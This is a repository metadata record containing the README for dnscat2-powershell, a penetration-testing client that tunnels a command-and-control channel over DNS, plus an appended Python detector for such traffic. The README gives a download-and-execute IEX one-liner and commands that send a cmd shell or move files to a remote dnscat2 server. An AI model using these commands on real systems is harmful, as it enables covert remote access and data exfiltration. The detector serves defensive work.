{"id":13540101,"url":"https://github.com/lukebaggett/dnscat2-powershell","last_synced_at":"2025-04-02T06:32:04.178Z","repository":{"id":24711262,"uuid":"28122958","full_name":"lukebaggett/dnscat2-powershell","owner":"lukebaggett","description":"A Powershell client for dnscat2, an encrypted DNS command and control tool.","archived":true,"fork":false,"pushed_at":"2023-08-22T03:20:46.000Z","size":1050,"stargazers_count":392,"open_issues_count":5,"forks_count":120,"subscribers_count":19,"default_branch":"master","last_synced_at":"2024-11-03T05:32:26.320Z","etag":null,"topics":["penetration-testing","powershell","security"],"latest_commit_sha":null,"homepage":"https://github.com/iagox86/dnscat2","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lukebaggett.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2014-12-17T05:38:41.000Z","updated_at":"2024-10-01T15:16:16.000Z","dependencies_parsed_at":"2024-01-12T03:36:26.634Z","dependency_job_id":"a56e2b20-ac3b-41c2-9fe4-3f6b95576b0b","html_url":"https://github.com/lukebaggett/dnscat2-powershell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukebaggett%2Fdnscat2-powershell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukebaggett%2Fdnscat2-powershell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukebaggett%2Fdnscat2-powershell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukebaggett%2Fdnscat2-p
owershell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lukebaggett","download_url":"https://codeload.github.com/lukebaggett/dnscat2-powershell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246768364,"owners_count":20830653,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["penetration-testing","powershell","security"],"created_at":"2024-08-01T09:01:40.336Z","updated_at":"2025-04-02T06:32:03.294Z","avatar_url":"https://github.com/lukebaggett.png","language":"PowerShell","funding_links":[],"categories":["\u003ca id=\"7485e724ef5efd1daf9d672bd72fb595\"\u003e\u003c/a\u003eDNS protocol","\u003ca id=\"a76463feb91d09b3d024fae798b92be6\"\u003e\u003c/a\u003eReconnaissance\u0026\u0026Information gathering\u0026\u0026Subdomain discovery and enumeration\u0026\u0026OSINT","Scanners, asset collection, subdomains"],"sub_categories":["\u003ca id=\"d70a62f77fa20a2219e81fa61527e644\"\u003e\u003c/a\u003eTools","\u003ca id=\"a695111d8e30d645354c414cb27b7843\"\u003e\u003c/a\u003eDNS","Network services_Other"],"readme":"[dnscat2](https://github.com/iagox86/dnscat2) is a DNS covert channel tool by [@iagox86 (Ron Bowes)](https://blog.skullsecurity.org/) which is used to transfer data over DNS requests.\n\nThis is a powershell version of the dnscat2 C client.\n\n[Click here for a blog post](http://www.blackhillsinfosec.com/?p=5578) that gives a more detailed breakdown of the purpose of this script, and how to use it.\n\nTo use this script, you'll need the Ruby [dnscat2 server](https://github.com/iagox86/dnscat2). **Make sure to add the `--no-cache` option when running the server. 
This client is incompatible with the server's caching.**\n\n### Setup\n\n[First, install the dnscat2 server.](https://github.com/iagox86/dnscat2/blob/master/README.md) Start the server with caching disabled using `--no-cache`. The command to start your server should look something like this: `ruby dnscat2.rb --dns=\"domain=example.com\" --no-cache`\n\nNext, launch Windows Powershell (version 2.0 or later). You can use this command to load the dnscat2 powershell functions:\n\n    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')\n\nThis downloads and executes whatever is currently on the master branch; review the script (or pin a specific commit and check its hash) before running it.\n\n### Examples\n\nStart-Dnscat2 is the actual function used as the client. Specify the dnscat2 server using `-Domain`.\n\n    Start a command session, and send DNS requests to 8.8.8.8 on port 53:\n        Start-Dnscat2 -Domain \u003cdnscat2 server\u003e -DNSServer 8.8.8.8\n\n    Send a cmd shell, and send DNS requests to the default DNS Server set in Windows:\n        Start-Dnscat2 -Domain \u003cdnscat2 server\u003e -Exec cmd\n\n    Start a console session. Only use CNAME, MX, and AAAA requests:\n        Start-Dnscat2 -Domain \u003cdnscat2 server\u003e -LookupTypes @(\"CNAME\",\"MX\",\"AAAA\") -Console\n\n    Do not encrypt the session. Encryption is enabled by default.\n        Start-Dnscat2 -Domain \u003cdnscat2 server\u003e -NoEncryption\n\n### Powershell Command Session Commands\n\nThe client can handle normal dnscat2 commands, or the *powershell version* of that command. 
To use the powershell version of a command, set specific parameters the client will detect (These are commands run from a command session on the server):\n\n    Start a new session which simulates a Powershell shell, like ExecPS:\n        exec psh\n\n    Upload app.exe on the server into a hex string stored in the $app powershell variable:\n        upload app.exe hex:$app\n    \n    Download the byte array stored in the $app powershell variable to app.exe on the server:\n        download bytes:$app app.exe\n\n### Start-Dnscat2\n\n    -Domain \u003cString\u003e          The Domain being used by the dnscat2 server.\n    -DNSServer \u003cString\u003e       The hostname or IP Address to send DNS queries to. (Default: Set by Windows)\n    -DNSPort \u003cInt32\u003e          The port to send DNS queries to. (Default: 53)\n    \n    -Command                  Start a command session. (Default)\n    -Exec \u003cString\u003e            Link the I/O of a process with the Dnscat2 session.\n    -Console                  Link the I/O of the console with the Dnscat2 session.\n    -ExecPS                   Simulate a Powershell session and link the IO with the Dnscat2 session.\n                              WARNING: Exiting will kill the entire dnscat2 client, not just the session.\n    \n    -PreSharedSecret          Set the same secret on the server to authenticate and prevent MITM.\n    -NoEncryption             Do not use encryption.\n    \n    -LookupTypes \u003cString[]\u003e   Set an array of lookup types to randomly switch between.\n                              Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME)\n    -Delay \u003cInt32\u003e            Set a delay between each request, in milliseconds. (Default: 0)\n    -MaxRandomDelay \u003cInt32\u003e   Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0)\n    -MaxPacketSize \u003cInt32\u003e    Maximum length of a dnscat2 packet. 
(Default: 240)\n    -Name \u003cString\u003e            The name of your dnscat2 session. (Default: hostname)\n\n### ExecPS and 'exec psh'\n\ndnscat2-powershell simulates a powershell session by passing data from the server to Invoke-Expression. Only stdout is returned, and variables are preserved as long as the client is running. **Watch out** for things that exit powershell like \"exit\" and \"break\", because the entire dnscat2-powershell client will exit, not just the ExecPS session.\n\n### Other Credits\n\n* [db9 on stackoverflow's](https://stackoverflow.com/users/6866918/db9) [demonstration of BouncyCastle ECDH.](http://stackoverflow.com/a/39662164)\n* [FrankSpierings's](https://github.com/FrankSpierings) implementation of [Salsa20](https://gist.github.com/FrankSpierings/c18da658e06948313fff) and [Sha3](https://gist.github.com/FrankSpierings/3577b0365d02df6f7eeb) in Powershell via C#.\n* [Rebex Labs stripped down version of the BouncyCastle DLL for ECC.](http://labs.rebex.net/curves)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukebaggett%2Fdnscat2-powershell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flukebaggett%2Fdnscat2-powershell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukebaggett%2Fdnscat2-powershell/lists"}
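Added example, not part of the dnscat2-powershell repository or its README: a Python detection heuristic a defender could run over resolver query logs to surface traffic shaped like the client described above. It assumes a constructed log format of `<timestamp> <client_ip> <qtype> <qname>`, approximates the registrable domain by its last two labels, and treats long hex-like labels as the sign of encoded packet data. The README only states that the client rotates between TXT, MX, CNAME, A and AAAA lookups and sends many queries under one domain; the hex-label assumption comes from how dnscat2 encodes packets into query names, not from this page, and all sample log lines are made up.

```python
import math
import re
from collections import defaultdict

# Record types the dnscat2-powershell client can rotate between (from the README).
DNSCAT_TYPES = {"TXT", "MX", "CNAME", "A", "AAAA"}
# A label is "hex-like" when it is all hex digits and at least 16 characters long.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")

# Constructed sample log (not real traffic): "<timestamp> <client_ip> <qtype> <qname>".
# Client 10.0.0.5 imitates a covert channel; the other two clients do ordinary lookups.
SAMPLE_LOG = """\
2025-01-01T10:00:00 10.0.0.5 TXT 4a1f9c0000010000a6f3b2c1d0e9f8a7.b6c5d4e3f2a1b0c9d8e7f6a5b4c3d2e1.example.com
2025-01-01T10:00:01 10.0.0.5 MX 4a1f9c0000020001b7e4c3d2e1f0a9b8.c7d6e5f4a3b2c1d0e9f8a7b6c5d4e3f2.example.com
2025-01-01T10:00:01 10.0.0.5 CNAME 4a1f9c0000030002c8f5d4e3f2a1b0c9.d8e7f6a5b4c3d2e1f0a9b8c7d6e5f4a3.example.com
2025-01-01T10:00:02 10.0.0.5 TXT 4a1f9c0000040003d9a6e5f4a3b2c1d0.e9f8a7b6c5d4e3f2a1b0c9d8e7f6a5b4.example.com
2025-01-01T10:00:02 10.0.0.5 MX 4a1f9c0000050004eab7f6a5b4c3d2e1.f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5.example.com
2025-01-01T10:00:03 10.0.0.5 CNAME 4a1f9c0000060005fbc8a7b6c5d4e3f2.a1b0c9d8e7f6a5b4c3d2e1f0a9b8c7d6.example.com
2025-01-01T10:00:03 10.0.0.7 A www.example.org
2025-01-01T10:00:04 10.0.0.7 AAAA www.example.org
2025-01-01T10:00:05 10.0.0.9 A cdn.example.net
2025-01-01T10:00:05 10.0.0.9 A img.example.net
2025-01-01T10:00:06 10.0.0.9 A api.example.net
this line is malformed and is skipped
"""


def parse_log(text):
    """Yield (client_ip, qtype, qname) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, client, qtype, qname = parts
        yield client, qtype.upper(), qname.lower().rstrip(".")


def parent_domain(qname):
    """Approximate the registrable domain as the last two labels (example-only
    shortcut; use a public-suffix list on real data)."""
    return ".".join(qname.split(".")[-2:])


def shannon_entropy(s):
    """Bits per character of s: random hex approaches 4.0, hostnames sit far lower."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def profile_domains(records):
    """Aggregate, per (client, parent domain), the features the detector scores."""
    profiles = defaultdict(lambda: {
        "names": set(), "types": set(),
        "labels": 0, "hex_labels": 0, "label_chars": 0, "entropy_sum": 0.0,
    })
    for client, qtype, qname in records:
        parent = parent_domain(qname)
        sub = qname[:-len(parent) - 1] if qname != parent else ""
        p = profiles[(client, parent)]
        p["names"].add(qname)
        p["types"].add(qtype)
        for label in filter(None, sub.split(".")):
            p["labels"] += 1
            p["label_chars"] += len(label)
            if HEX_LABEL.match(label):
                p["hex_labels"] += 1
        p["entropy_sum"] += shannon_entropy(sub.replace(".", ""))
    return profiles


def indicators(p, hex_ratio=0.5, mean_label_len=20, mean_entropy=3.2, min_names=3):
    """Return the list of indicators one profile triggers (thresholds are starting points)."""
    hits = []
    n_names = len(p["names"])
    if p["labels"] and p["hex_labels"] / p["labels"] >= hex_ratio:
        hits.append("hex-like labels")
    if p["labels"] and p["label_chars"] / p["labels"] >= mean_label_len:
        hits.append("long labels")
    if n_names and p["entropy_sum"] / n_names >= mean_entropy:
        hits.append("high-entropy subdomains")
    # Rotation between the client's lookup types across many distinct names.
    if len(p["types"] & DNSCAT_TYPES) >= 2 and n_names >= min_names:
        hits.append("record-type rotation over many unique names")
    return hits


def detect(text, min_hits=3):
    """Map (client, parent domain) -> indicators for every profile with >= min_hits."""
    flagged = {}
    for key, p in profile_domains(parse_log(text)).items():
        hits = indicators(p)
        if len(hits) >= min_hits:
            flagged[key] = hits
    return flagged


if __name__ == "__main__":
    for (client, domain), hits in detect(SAMPLE_LOG).items():
        print(f"{client} -> {domain}: {', '.join(hits)}")
```

Adjust `parse_log` to your resolver's export format before running it on real logs. The heuristic deliberately keys on name structure and record-type mix rather than query rate, because the client's `-Delay` and `-MaxRandomDelay` options make timing an unreliable signal on its own.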